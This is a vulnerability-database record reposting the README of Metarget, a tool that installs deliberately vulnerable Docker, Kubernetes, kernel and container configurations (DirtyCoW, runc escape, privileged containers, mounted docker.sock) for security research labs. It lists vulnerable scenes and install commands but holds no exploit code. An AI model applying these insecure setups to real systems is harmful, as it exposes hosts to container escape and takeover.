DATABASE RESOURCES PRICING ABOUT US

{"id": "KITPLOIT:8656177976839178440", "vendorId": null, "type": "kitploit", "bulletinFamily": "tools", "title": "Metarget - Framework Providing Automatic Constructions Of Vulnerable Infrastructures", "description": "[](<https://1.bp.blogspot.com/-JeZ6iIg4ybA/YLcuC2qo4HI/AAAAAAAAXk8/Exp1sNi-whoUTpfq1BCbDLDi0TOKgJIPgCNcBGAsYHQ/s484/metarget.png>)\n\n \n\n\n**1 Introduction** \n\n\nMetarget = `meta-` \\+ `target`, a framework providing automatic constructions of vulnerable infrastructures, used to deploy simple or complicated vulnerable cloud native targets swiftly and automatically.\n\n \n**1.1 Why Metarget?** \n\n\nDuring security researches, we might find that the deployment of vulnerable environment often takes much time, while the time spent on testing PoC or ExP is comparatively short. In the field of cloud native security, thanks to the complexity of cloud native systems, this issue is more terrible.\n\nThere are already some excellent security projects like [Vulhub](<https://github.com/vulhub/vulhub> \"Vulhub\" ), [VulApps](<https://github.com/Medicean/VulApps> \"VulApps\" ) in the open-source community, which pack vulnerable scenes into container images, so that researchers could utilize them and deploy scenes quickly.\n\nHowever, these projects mainly focus on [vulnerabilities](<https://www.kitploit.com/search/label/vulnerabilities> \"vulnerabilities\" ) in applications. What if we need to study the vulnerabilities in the infrastructures like Docker, Kubernetes and even Linux kernel?\n\nHence, we develop Metarget and hope to solve the deployment issue above to some extent. Furthermore, we also expect that Metarget could help to construct **multilayer** vulnerable cloud native scenes automatically.\n\n \n**1.2 Install Vulnerability!** \n\n\nIn this project, we come up with concepts like _installing vulnerabilities_ and _installing vulnerable scenes_. Why not install vulnerabilities just like installing softwares? We can do that, because our goals are security research and offensive security.\n\nTo be exact, we expect that:\n\n * `metarget cnv install cve-2019-5736` will install Docker with CVE-2019-5736 onto the server.\n * `metarget cnv install cve-2018-1002105` will install Kubernetes with CVE-2018-1002105 onto the server.\n * `metarget cnv install kata-escape-2020` will install Kata-containers with CVE-2020-2023/2025/2026 onto the server.\n * `metarget cnv install cve-2016-5195` will install a kernel with DirtyCoW into the server.\n\nIt's cool, right? No more steps. No RTFM. Execute one command and enjoy your coffee.\n\nFurthermore, we expect that:\n\n * with Metarget's help, ethical hackers are able to deploy simple or complicated cloud native targets swiftly and learn by hacking cloud native environments.\n * `metarget appv install dvwa` will install a [DVWA](<https://github.com/digininja/DVWA> \"DVWA\" ) target onto our vulnerable infrastructure.\n * `metarget appv install thinkphp-5-0-23-rce --external` will install a ThinkPHP RCE [vulnerability](<https://www.kitploit.com/search/label/Vulnerability> \"vulnerability\" ) with `NodePort` service onto our vulnerable infrastructure.\n\nYou can just run 5 commands below after installing a new Ubuntu and obtain a multi-layer vulnerable scene:\n \n \n ./metarget cnv install cve-2016-5195 # container escape with dirtyCoW \n ./metarget cnv install cve-2019-5736 # container escape with docker \n ./metarget cnv install cve-2018-1002105 # kubernetes single-node cluster with cve-2018-1002105 \n ./metarget cnv install privileged-container # deploy a privileged container \n ./metarget appv install dvwa --external # deploy dvwa target\n\nRCE, container escape, lateral movement, persistence, they are yours now.\n\nMore awesome functions are coming! Stay tuned :)\n\nNote:\n\nThie project aims to provide vulnerable scenes for security research. The security of scenes generated is not guaranteed. It is **NOT** recommended to deploy components or scenes with Metarget on the Internet.\n\n \n**2 Usage** \n \n**2.1 Basic Usage** \n\n \n \n usage: metarget [-h] [-v] subcommand ... \n \n automatic constructions of vulnerable infrastructures \n \n positional arguments: \n subcommand description \n gadget cloud native gadgets (docker/k8s/...) management \n cnv cloud native vulnerabilities management \n appv application vulnerabilities management \n \n optional arguments: \n -h, --help show this help message and exit \n -v, --version show program's version number and exit \n \n\nRun `./metarget gadget list` to see cloud native components supported currently.\n\n \n**2.2 Manage [Cloud Native](<https://www.kitploit.com/search/label/Cloud%20Native> \"Cloud Native\" ) Components** \n\n \n \n usage: metarget gadget [-h] subcommand ... \n \n positional arguments: \n subcommand description \n list list supported gadgets \n install install gadgets \n remove uninstall gadgets \n \n optional arguments: \n -h, --help show this help message and exit \n \n\n \n**2.2.1 Case: Install Docker with Specified Version** \n\n\nRun:\n \n \n ./metarget gadget install docker --version 18.03.1\n\nIf the command above completes successfully, 18.03.1 Docker will be installed.\n\n \n**2.2.2 Case: Install Kubernetes with Specified Version** \n\n\nRun:\n \n \n ./metarget gadget install k8s --version 1.16.5\n\nIf the command above completes successfully, 1.16.5 Kubernetes single-node cluster will be installed.\n\nNote:\n\nUsually, lots of options need to be configured in Kubernetes. As a security research project, Metarget provides some options for installation of Kubernetes:\n \n \n -v VERSION, --version VERSION \n gadget version \n --cni-plugin CNI_PLUGIN \n cni plugin, flannel by default \n --pod-network-cidr POD_NETWORK_CIDR \n pod network cidr, default cidr for each plugin by \n default \n --taint-master taint master node or not \n \n\n**Metarget supports deployment of multi-node cluster. If you want to add more nodes into the cluster, you can copy `tools/install_k8s_worker.sh` script and run it on each worker nodes after the successful installation of single-node cluster.**\n\n \n**2.2.3 Case: Install Kata-containers with Specified Version** \n\n\nRun:\n \n \n ./metarget gadget install kata --version 1.10.0\n\nIf the command above completes successfully, 1.10.0 Kata-containers will be installed.\n\nNote:\n\nYou can also specify the type of kata runtime (qemu/clh/fc/...) with `--kata-runtime-type` option, which is `qemu` by default.\n\n \n**2.2.4 Case: Install [Linux Kernel](<https://www.kitploit.com/search/label/Linux%20Kernel> \"Linux Kernel\" ) with Specified Version** \n\n\nRun:\n \n \n ./metarget gadget install kernel --version 5.7.5\n\nIf the command above completes successfully, 5.7.5 kernel will be installed.\n\nNote:\n\nCurrently, Metarget install kernels in 2 ways:\n\n 1. apt\n 2. if apt package is not available, download *.deb remotely from Ubuntu and try to install\n\nAfter successful installation of kernel, reboot of system is needed. Metarget will prompt to reboot automatically.\n\n \n**2.3 Manage Vulnerable Scenes Related to Cloud Native Components** \n\n \n \n usage: metarget cnv [-h] subcommand ... \n \n positional arguments: \n subcommand description \n list list supported cloud native vulnerabilities \n install install cloud native vulnerabilities \n remove uninstall cloud native vulnerabilities \n \n optional arguments: \n -h, --help show this help message and exit \n \n\nRun `./metarget cnv list` to see vulnerable scenes related to cloud native components supported currently.\n\n \n**2.3.1 Case: CVE-2019-5736** \n\n\nRun:\n \n \n ./metarget cnv install cve-2019-5736\n\nIf the command above completes successfully, Docker with CVE-2019-5736 will be installed\u3002\n\n \n**2.3.2 Case: CVE-2018-1002105** \n\n\nRun:\n \n \n ./metarget cnv install cve-2018-1002105\n\nIf the command above completes successfully, Kubernetes with CVE-2018-1002105 will be installed\u3002\n\n \n**2.3.3 Case: Kata-containers Escape** \n\n\nRun:\n \n \n ./metarget cnv install kata-escape-2020\n\nIf the command above completes successfully, Kata-containers with CVE-2020-2023/2025/2026 will be installed\u3002\n\n \n**2.3.4 Case: CVE-2016-5195** \n\n\nRun:\n \n \n ./metarget cnv install cve-2016-5195\n\nIf the command above completes successfully, kernel with CVE-2016-5195 will be installed\u3002\n\n \n**2.4 Manage Vulnerable Scenes Related to Cloud Native Applications** \n\n \n \n usage: metarget appv [-h] subcommand ... \n \n positional arguments: \n subcommand description \n list list supported application vulnerabilities \n install install application vulnerabilities \n remove uninstall application vulnerabilities \n \n optional arguments: \n -h, --help show this help message and exit \n \n\nRun `./metarget appv list` to see vulnerable scenes related to cloud native applications supported currently.\n\nNote:\n\nBefore deploying application vulnerable scenes, you should install Docker and Kubernetes firstly. You can use Metarget to install Docker and Kubernetes.\n\n \n**2.4.1 Case: DVWA** \n\n\nRun:\n \n \n ./metarget appv install dvwa\n\nIf the command above completes successfully, [DVWA](<https://github.com/digininja/DVWA> \"DVWA\" ) will be deployed as _Deployment_ and _Service_ resources in current Kubernetes.\n\nNote:\n\nYou can specify `--external` option, then the service will be exposed as `NodePort`, so that you can visit it by IP of the host node.\n\nBy default, the type of service is `ClusterIP`.\n\n \n**2.5 Manage Vulnerable Cloud Native Target Cluster** \n\n\nDeveloping, currently not supported.\n\n \n**3 Installation** \n \n**3.1 Requirements** \n\n\n * Ubuntu 16.04 or 18.04\n * Python &gt;= 3.5\n * pip3\n \n**3.2 From Source** \n\n\nClone the repository and install requirements:\n \n \n git clone https://github.com/brant-ruan/metarget.git \n cd metarget/ \n pip install -r requirements.txt\n\nBegin to use Metarget and construct vulnerable scenes. For example:\n \n \n ./metarget cnv install cve-2019-5736\n\n \n**3.3 From PyPI** \n\n\nCurrently unsupported.\n\n \n**4 Scene List** \n \n**4.1 Vulnerable Scenes Related to Cloud Native Components** \nName | Class | Type | CVSS 3.x | Status \n---|---|---|---|--- \n[cve-2018-15664](<https://github.com/brant-ruan/metarget/blob/master/vulns_cn/docker/cve-2018-15664.yaml> \"cve-2018-15664\" ) | docker | container_escape | [7.5](<https://nvd.nist.gov/vuln/detail/CVE-2018-15664> \"7.5\" ) | \n\n\u2705 \n \n[cve-2019-13139](<https://github.com/brant-ruan/metarget/blob/master/vulns_cn/docker/cve-2019-13139.yaml> \"cve-2019-13139\" ) | docker | command_execution | [8.4](<https://nvd.nist.gov/vuln/detail/CVE-2019-13139> \"8.4\" ) | \n\n\u2705 \n \n[cve-2019-14271](<https://github.com/brant-ruan/metarget/blob/master/vulns_cn/docker/cve-2019-14271.yaml> \"cve-2019-14271\" ) | docker | container_escape | [9.8](<https://nvd.nist.gov/vuln/detail/CVE-2019-14271> \"9.8\" ) | \n\n\u2705 \n \n[cve-2020-15257](<https://github.com/brant-ruan/metarget/blob/master/vulns_cn/docker/cve-2020-15257.yaml> \"cve-2020-15257\" ) | docker/containerd | container_escape | [5.2](<https://nvd.nist.gov/vuln/detail/CVE-2020-15257> \"5.2\" ) | \n\n\u2705 \n \n[cve-2019-5736](<https://github.com/brant-ruan/metarget/blob/master/vulns_cn/docker/cve-2019-5736.yaml> \"cve-2019-5736\" ) | docker/runc | container_escape | [8.6](<https://nvd.nist.gov/vuln/detail/CVE-2019-5736> \"8.6\" ) | \n\n\u2705 \n \n[cve-2017-1002101](<https://github.com/brant-ruan/metarget/blob/master/vulns_cn/kubernetes/cve-2017-1002101.yaml> \"cve-2017-1002101\" ) | kubernetes | container_escape | [9.6](<https://nvd.nist.gov/vuln/detail/CVE-2017-1002101> \"9.6\" ) | \n\n\u2705 \n \n[cve-2018-1002105](<https://github.com/brant-ruan/metarget/blob/master/vulns_cn/kubernetes/cve-2018-1002105.yaml> \"cve-2018-1002105\" ) | kubernetes | privilege_escalation | [9.8](<https://nvd.nist.gov/vuln/detail/CVE-2018-1002105> \"9.8\" ) | \n\n\u2705 \n \n[cve-2019-11253](<https://github.com/brant-ruan/metarget/blob/master/vulns_cn/kubernetes/cve-2019-11253.yaml> \"cve-2019-11253\" ) | kubernetes | denial_of_service | [7.5](<https://nvd.nist.gov/vuln/detail/CVE-2019-11253> \"7.5\" ) | \n\n\u2705 \n \n[cve-2019-9512](<https://github.com/brant-ruan/metarget/blob/master/vulns_cn/kubernetes/cve-2019-9512.yaml> \"cve-2019-9512\" ) | kubernetes | denial_of_service | [7.5](<https://nvd.nist.gov/vuln/detail/CVE-2019-9512> \"7.5\" ) | \n\n\u2705 \n \n[cve-2019-9514](<https://github.com/brant-ruan/metarget/blob/master/vulns_cn/kubernetes/cve-2019-9514.yaml> \"cve-2019-9514\" ) | kubernetes | denial_of_service | [7.5](<https://nvd.nist.gov/vuln/detail/CVE-2019-9514> \"7.5\" ) | \n\n\u2705 \n \n[cve-2020-8554](<https://github.com/brant-ruan/metarget/blob/master/vulns_cn/kubernetes/cve-2020-8554.yaml> \"cve-2020-8554\" ) | kubernetes | man_in_the_middle | [5.0](<https://nvd.nist.gov/vuln/detail/CVE-2020-8554> \"5.0\" ) | \n\n\u2705 \n \n[cve-2020-8557](<https://github.com/brant-ruan/metarget/blob/master/vulns_cn/kubernetes/cve-2020-8557.yaml> \"cve-2020-8557\" ) | kubernetes | denial_of_service | [5.5](<https://nvd.nist.gov/vuln/detail/CVE-2020-8557> \"5.5\" ) | \n\n\u2705 \n \n[cve-2020-8558](<https://github.com/brant-ruan/metarget/blob/master/vulns_cn/kubernetes/cve-2020-8558.yaml> \"cve-2020-8558\" ) | kubernetes | exposure_of_service | [8.8](<https://nvd.nist.gov/vuln/detail/CVE-2020-8558> \"8.8\" ) | \n\n\u2705 \n \n[cve-2016-5195](<https://github.com/brant-ruan/metarget/blob/master/vulns_cn/kernel/cve-2016-5195.yaml> \"cve-2016-5195\" ) | kernel | container_escape | [7.8](<https://nvd.nist.gov/vuln/detail/CVE-2016-5195> \"7.8\" ) | \n\n\u2705 \n \n[cve-2018-18955](<https://github.com/brant-ruan/metarget/blob/master/vulns_cn/kernel/cve-2018-18955.yaml> \"cve-2018-18955\" ) | kernel | privilege_escalation | [7.0](<https://nvd.nist.gov/vuln/detail/CVE-2018-18955> \"7.0\" ) | \n\n\u2705 \n \n[cve-2020-14386](<https://github.com/brant-ruan/metarget/blob/master/vulns_cn/kernel/cve-2020-14386.yaml> \"cve-2020-14386\" ) | kernel | container_escape | [7.8](<https://nvd.nist.gov/vuln/detail/CVE-2020-14386> \"7.8\" ) | \n\n\u2705 \n \n[cap_dac_read_search-container](<https://github.com/brant-ruan/metarget/blob/master/vulns_cn/configs/cap_dac_read_search-container.yaml> \"cap_dac_read_search-container\" ) | config | container_escape | - | \n\n\u2705 \n \n[cap_sys_admin-container](<https://github.com/brant-ruan/metarget/blob/master/vulns_cn/configs/cap_sys_admin-container.yaml> \"cap_sys_admin-container\" ) | config | container_escape | - | \n\n\u2705 \n \n[cap_sys_ptrace-container](<https://github.com/brant-ruan/metarget/blob/master/vulns_cn/configs/cap_sys_ptrace-container.yaml> \"cap_sys_ptrace-container\" ) | config | container_escape | - | \n\n\u2705 \n \n[privileged-container](<https://github.com/brant-ruan/metarget/blob/master/vulns_cn/configs/privileged-container.yaml> \"privileged-container\" ) | config | container_escape | - | \n\n\u2705 \n \n[mount-docker-sock](<https://github.com/brant-ruan/metarget/blob/master/vulns_cn/mounts/mount-docker-sock.yaml> \"mount-docker-sock\" ) | mount | container_escape | - | \n\n\u2705 \n \n[mount-host-etc](<https://github.com/brant-ruan/metarget/blob/master/vulns_cn/mounts/mount-host-etc.yaml> \"mount-host-etc\" ) | mount | container_escape | - | \n\n\u2705 \n \n[mount-host-procfs](<https://github.com/brant-ruan/metarget/blob/master/vulns_cn/mounts/mount-host-procfs.yaml> \"mount-host-procfs\" ) | mount | container_escape | - | \n\n\u2705 \n \n[kata-escape-2020](<https://github.com/brant-ruan/metarget/blob/master/vulns_cn/kata-containers/kata-escape-2020.yaml> \"kata-escape-2020\" ) | kata-containers | container_escape | [6.3](<https://nvd.nist.gov/vuln/detail/CVE-2020-2023> \"6.3\" )/[8.8](<https://nvd.nist.gov/vuln/detail/CVE-2020-2025> \"8.8\" )/[8.8](<https://nvd.nist.gov/vuln/detail/CVE-2020-2026> \"8.8\" ) | \n\n\u2705 \n \n \n**4.2 Vulnerable Scenes Related to Cloud Native Applications** \n\n\nThese scenes are mainly derived from other open-source projects:\n\n * [Vulhub](<https://github.com/vulhub/vulhub> \"Vulhub\" )\n * [DVWA](<https://github.com/digininja/DVWA> \"DVWA\" )\n\nWe express sincere gratitude to projects above!\n\nMetarget converts scenes in projects above to _Deployments_ and _Services_ resources in Kubernetes (thanks to [kompose](<https://github.com/kubernetes/kompose> \"kompose\" )).\n\nTo list vulnerable scenes related to cloud native applications supported by Metarget, just run\uff1a\n \n \n ./metarget appv list\n\n \n**5 DEMO** \n\n\n[](<https://asciinema.org/a/407107>)\n\n \n\n\n**6 Development Plan** \n\n\n * deployments of basic cloud native components (docker, k8s)\n * integrations of vulnerable scenes related to cloud native components\n * integrations of RCE scenes in containers\n * automatic construction of multi-node cloud native target cluster\n * integrations of other cloud native vulnerable scenes (long term)\n \n**7 Maintainers** \n\n\n * [@brant-ruan](<https://github.com/brant-ruan> \"@brant-ruan\" )\n * [@ListenerMoya](<https://github.com/ListenerMoya> \"@ListenerMoya\" )\n \n**8 About Logo** \n\n\nIt is not a Kubernetes, but a vulnerable [infrastructure](<https://www.kitploit.com/search/label/Infrastructure> \"infrastructure\" ) with three gears which could not work well (vulnerable) :)\n\n \n \n\n\n**[Download Metarget](<https://github.com/brant-ruan/metarget> \"Download Metarget\" )**\n", "published": "2021-06-04T21:30:00", "modified": "2021-06-04T21:30:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "MEDIUM", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 9.3}, "severity": "HIGH", "exploitabilityScore": 8.6, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": true}, "cvss3": {"cvssV3": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "http://www.kitploit.com/2021/06/metarget-framework-providing-automatic.html", "reporter": "KitPloit", "references": ["https://github.com/Medicean/VulApps", "https://github.com/brant-ruan/metarget/blob/master/vulns_cn/mounts/mount-host-procfs.yaml", "https://github.com/brant-ruan/metarget/blob/master/vulns_cn/configs/cap_sys_admin-container.yaml", "https://github.com/brant-ruan/metarget/blob/master/vulns_cn/docker/cve-2020-15257.yaml", "https://github.com/brant-ruan", "https://github.com/brant-ruan/metarget/blob/master/vulns_cn/kubernetes/cve-2019-9514.yaml", "https://github.com/brant-ruan/metarget/blob/master/vulns_cn/docker/cve-2019-13139.yaml", "https://github.com/digininja/DVWA", "https://github.com/brant-ruan/metarget/blob/master/vulns_cn/docker/cve-2019-5736.yaml", "https://github.com/brant-ruan/metarget/blob/master/vulns_cn/kubernetes/cve-2017-1002101.yaml", "https://github.com/brant-ruan/metarget/blob/master/vulns_cn/kubernetes/cve-2020-8554.yaml", "https://github.com/brant-ruan/metarget/blob/master/vulns_cn/configs/privileged-container.yaml", "https://github.com/brant-ruan/metarget/blob/master/vulns_cn/kata-containers/kata-escape-2020.yaml", "https://github.com/brant-ruan/metarget/blob/master/vulns_cn/configs/cap_sys_ptrace-container.yaml", "https://github.com/brant-ruan/metarget/blob/master/vulns_cn/kubernetes/cve-2019-11253.yaml", "https://github.com/brant-ruan/metarget", "https://github.com/brant-ruan/metarget/blob/master/vulns_cn/kernel/cve-2016-5195.yaml", "https://github.com/brant-ruan/metarget/blob/master/vulns_cn/kernel/cve-2018-18955.yaml", "https://github.com/brant-ruan/metarget/blob/master/vulns_cn/mounts/mount-docker-sock.yaml", "https://github.com/brant-ruan/metarget/blob/master/vulns_cn/mounts/mount-host-etc.yaml", "https://github.com/brant-ruan/metarget/blob/master/vulns_cn/docker/cve-2019-14271.yaml", "https://github.com/vulhub/vulhub", "https://github.com/brant-ruan/metarget/blob/master/vulns_cn/configs/cap_dac_read_search-container.yaml", "https://github.com/brant-ruan/metarget/blob/master/vulns_cn/kubernetes/cve-2019-9512.yaml", "https://github.com/kubernetes/kompose", "https://github.com/brant-ruan/metarget/blob/master/vulns_cn/docker/cve-2018-15664.yaml", "https://github.com/brant-ruan/metarget/blob/master/vulns_cn/kubernetes/cve-2020-8557.yaml", "https://github.com/brant-ruan/metarget/blob/master/vulns_cn/kubernetes/cve-2018-1002105.yaml", "https://github.com/brant-ruan/metarget/blob/master/vulns_cn/kubernetes/cve-2020-8558.yaml", "https://github.com/brant-ruan/metarget/blob/master/vulns_cn/kernel/cve-2020-14386.yaml", "https://github.com/ListenerMoya"], "cvelist": ["CVE-2016-5195", "CVE-2017-1002101", "CVE-2018-1002105", "CVE-2018-15664", "CVE-2018-18955", "CVE-2019-11253", "CVE-2019-13139", "CVE-2019-14271", "CVE-2019-5736", "CVE-2019-9512", "CVE-2019-9514", "CVE-2020-14386", "CVE-2020-15257", "CVE-2020-2023", "CVE-2020-2025", "CVE-2020-2026", "CVE-2020-8554", "CVE-2020-8557", "CVE-2020-8558"], "immutableFields": [], "lastseen": "2022-04-07T12:01:56", "viewCount": 295, "enchantments": {"dependencies": {"references": [{"type": "almalinux", "idList": ["ALSA-2019:0975", "ALSA-2019:2925", "ALSA-2019:4269", "ALSA-2019:4273"]}, {"type": "alpinelinux", "idList": ["ALPINE:CVE-2019-9512", "ALPINE:CVE-2019-9514"]}, {"type": "amazon", "idList": ["ALAS-2016-757", "ALAS-2017-937", "ALAS-2018-956", "ALAS-2019-1156", "ALAS-2019-1245", "ALAS-2019-1270", "ALAS-2019-1316", "ALAS-2020-1430", "ALAS-2020-1446", "ALAS-2020-1455", "ALAS2-2018-956", "ALAS2-2019-1272", "ALAS2-2020-1488"]}, {"type": "android", "idList": ["ANDROID:CVE-2016-5195", "ANDROID:DIRTYC0W"]}, {"type": "androidsecurity", "idList": ["ANDROID:2016-11-01", "ANDROID:2016-12-01"]}, {"type": "apple", "idList": ["APPLE:B7EC2E92CBEF4481D5F2735898CA5FE4", "APPLE:HT210436"]}, {"type": "archlinux", "idList": ["ASA-201610-11", "ASA-201610-14", "ASA-201610-16", "ASA-201902-20", "ASA-201902-6", "ASA-201908-15", "ASA-201908-16", "ASA-202012-8"]}, {"type": "attackerkb", "idList": ["AKB:3C42D63D-858B-4BE3-8C0E-3423577B453B", "AKB:965E10D2-5365-4768-AD84-6D6B9E878CBF", "AKB:B6D57715-C0B3-48BB-8FDE-F3868F92DB1F"]}, {"type": "canvas", "idList": ["LINUX_FOLL_WRITE_COW"]}, {"type": "centos", "idList": ["CESA-2016:2098", "CESA-2016:2105", "CESA-2016:2124"]}, {"type": "cert", "idList": ["VU:243144", "VU:605641"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2019-0203", "CPAI-2019-1443"]}, {"type": "chrome", "idList": ["GCSA-2910604286347643311"]}, {"type": "cisa", "idList": ["CISA:374B105C289CECEBE37852514EEBDF8A"]}, {"type": "cisco", "idList": ["CISCO-SA-20161026-LINUX", "CISCO-SA-20190215-RUNC"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:06094473CAEAE018F16A4156F4D14103", "CFOUNDRY:1CA625F1FA872E0AB995AFC970D36DBC", "CFOUNDRY:28D7D983C9283C1F04F738490F4E9234", "CFOUNDRY:7430089B5BD03FDE67C945B0672A675E", "CFOUNDRY:DB19110DAE18C4BA41C1BD8688F693E2"]}, {"type": "coalfire", "idList": ["COALFIRE:D93AAC6D87124CC1032AC4DDE0C8780E"]}, {"type": "cve", "idList": ["CVE-2016-3919", "CVE-2016-5195", "CVE-2017-1002101", "CVE-2018-1002105", "CVE-2018-15664", "CVE-2018-18955", "CVE-2019-11253", "CVE-2019-12499", "CVE-2019-13139", "CVE-2019-14271", "CVE-2019-14988", "CVE-2019-14990", "CVE-2019-5736", "CVE-2019-9512", "CVE-2019-9514", "CVE-2020-14298", "CVE-2020-14386", "CVE-2020-15257", "CVE-2020-2023", "CVE-2020-2025", "CVE-2020-2026", "CVE-2020-8554", "CVE-2020-8557", "CVE-2020-8558"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2385-1:FDE93", "DEBIAN:DLA-2420-1:692E7", "DEBIAN:DLA-2420-2:175D1", "DEBIAN:DLA-2485-1:44FAA", "DEBIAN:DLA-670-1:F2D9C", "DEBIAN:DSA-3696-1:25A5B", "DEBIAN:DSA-3696-1:EEC99", "DEBIAN:DSA-4503-1:6B94A", "DEBIAN:DSA-4508-1:2E656", "DEBIAN:DSA-4520-1:26CCF", "DEBIAN:DSA-4521-1:FBAB8", "DEBIAN:DSA-4669-1:2AD2E", "DEBIAN:DSA-4865-1:E637E"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2016-5195", "DEBIANCVE:CVE-2017-1002101", "DEBIANCVE:CVE-2018-1002105", "DEBIANCVE:CVE-2018-15664", "DEBIANCVE:CVE-2018-18955", "DEBIANCVE:CVE-2019-11253", "DEBIANCVE:CVE-2019-12499", "DEBIANCVE:CVE-2019-13139", "DEBIANCVE:CVE-2019-14271", "DEBIANCVE:CVE-2019-5736", "DEBIANCVE:CVE-2019-9512", "DEBIANCVE:CVE-2019-9514", "DEBIANCVE:CVE-2020-14298", "DEBIANCVE:CVE-2020-14386", "DEBIANCVE:CVE-2020-15257", "DEBIANCVE:CVE-2020-8554", "DEBIANCVE:CVE-2020-8557", "DEBIANCVE:CVE-2020-8558"]}, {"type": "exploitdb", "idList": ["EDB-ID:45886", "EDB-ID:45915", "EDB-ID:46052", "EDB-ID:46053", "EDB-ID:46369", "EDB-ID:47164", "EDB-ID:47165", "EDB-ID:47166", "EDB-ID:47167"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:20F23DF94A0E746F333E556E7F8DBEEE", "EXPLOITPACK:27BBE2C0B861B43954ED29F30415313B", "EXPLOITPACK:506564B8B921FABB6887F0B08F3361D8", "EXPLOITPACK:6987711F7515BF1BA7025F22C1A40644", "EXPLOITPACK:956C5219D3B18D5E3A8A5BE9918D3BE1", "EXPLOITPACK:A525E32FDF6F1ECE16D67E1741C48E11", "EXPLOITPACK:B907702ACF859EE2C62E61A4D3DF318F", "EXPLOITPACK:EA786C17710A442C23153DFE02E06789"]}, {"type": "f5", "idList": ["F5:K01988340", "F5:K10558632", "F5:K39103040", "F5:K46011592", "F5:K46421255", "F5:K50233772", "F5:K58523450", "F5:K98053339", "SOL10558632"]}, {"type": "fedora", "idList": ["FEDORA:0456260427FD", "FEDORA:0907F624D00F", "FEDORA:0C9226047329", "FEDORA:1308F60C4220", "FEDORA:14FCA30C8E50", "FEDORA:1BF5960DA5CE", "FEDORA:1D3BD6049C24", "FEDORA:1E5DF60CC4A6", "FEDORA:1EC0F60C8AD5", "FEDORA:23B4B60D1C89", "FEDORA:28217613F7D7", "FEDORA:37FA36077DE7", "FEDORA:3A64160C815D", "FEDORA:3E17230B6FC0", "FEDORA:421346101A44", "FEDORA:4ED92309D32B", "FEDORA:5869F62F1007", "FEDORA:60A1A6076012", "FEDORA:6381060486F6", "FEDORA:691DA613FFAA", "FEDORA:6A06E60877B7", "FEDORA:6B92130C7DAE", "FEDORA:7FBE46071258", "FEDORA:800BC60776C5", "FEDORA:813AC604EC12", "FEDORA:86E49602F5A7", "FEDORA:976B760CEC41", "FEDORA:9A84E605A374", "FEDORA:A339A30B0665", "FEDORA:A4B3030CB2BB", "FEDORA:B42946075886", "FEDORA:B81753052DF9", "FEDORA:BDA8C6056EF5", "FEDORA:C780830AA9C9", "FEDORA:CCB9960F3CBA", "FEDORA:D0736603EB7F", "FEDORA:D307A6040ED0", "FEDORA:D35EC607603A", "FEDORA:D50D230A1CFA", "FEDORA:E1B606076F4E", "FEDORA:E3C59624D00E", "FEDORA:E5C91604A708", "FEDORA:E84586030F6B"]}, {"type": "fortinet", "idList": ["FG-IR-16-063", "FG-IR-19-225"]}, {"type": "freebsd", "idList": ["41F4BAAC-BF77-11E9-8D2F-5404A68AD561", "72A5579E-C765-11E9-8052-0028F8D09152", "73B1E734-C74E-11E9-8052-0028F8D09152", "9FBAEFB3-837E-11EA-B5B4-641C67A117D8", "C97A940B-C392-11E9-BB38-000D3AB229D6"]}, {"type": "gentoo", "idList": ["GLSA-202003-21", "GLSA-202105-33"]}, {"type": "github", "idList": ["GHSA-32GV-6CF3-WCMQ", "GHSA-36XW-FX78-C5R4", "GHSA-579H-MV94-G4GP", "GHSA-6978-VG2J-CC9Q", "GHSA-877X-32PM-P28X", "GHSA-J9WF-VVM6-4R9W", "GHSA-PMQP-H87C-MR78", "GHSA-WQV3-8CM6-H6WG"]}, {"type": "githubexploit", "idList": ["05A9BE7D-0317-5F20-87C1-D63BA3A06BE4", "1BB3E3DD-F59A-5A19-A6FD-5C20AD2531A3", "1BD47E86-3B10-5D96-B1C1-658AFD757407", "2747307D-D8C7-5045-A017-AA9E18552C41", "2C78124E-4C73-5C91-B8BF-5079AC3CDFA1", "2F6984D3-FD79-5AB7-A71D-43FF8E8DABBF", "38F2629A-330D-5488-A1E9-B85A647EE2FD", "49F291AB-38E4-506D-A185-70178D091F27", "51C8D6A4-47A9-5CDF-B833-7159E9EC70EE", "6D9188F6-8329-5A5F-8C00-BA11D76DCC8A", "6FE4C3C0-D500-5202-A7DB-D2A17693D071", "7BF9A69C-010C-5E27-AFF1-BD5C35E75269", "7C6B3B7F-060E-52A2-98DE-429893092989", "7E3511B5-C528-5213-B2AD-D36D4F8ACC95", "89C838C0-79FF-5954-84E9-527AC74184B4", "8B409CA3-4DAE-57CA-B491-B4590CB1E0FB", "A10132DA-F650-5163-A3F9-DBE973D0187D", "A249241C-8F8A-5640-BDDD-E66E8A9E48B8", "C493E2BD-3B57-5FD7-BFB9-B71408617084", "CC081819-FE94-5E7C-AF61-E00A82E76DE2", "D438FC99-880C-54A1-AE03-121CCA980E24", "DFCB8D82-860E-5D5D-ABA6-50C59B69936B", "E486E79A-CFAD-56DE-B622-D64E700A822C", "E5C9B17F-EC84-52B1-8901-335B1815C813", "EEEB5AA5-1DFC-529A-A0F1-D4D66C503664", "F68A7C89-1ADB-5CF7-8EAC-4DEA137ED81A"]}, {"type": "gitlab", "idList": ["GITLAB-5500087BBC45985A3CC96CCEE83115CF", "GITLAB-6F988FDCE2C2062262D3DCE1A158481C", "GITLAB-7983D14BF068BEC3C2FCAA9B7C966E8D", "GITLAB-810ADA37F486B156C48C2FACE0963EC3", 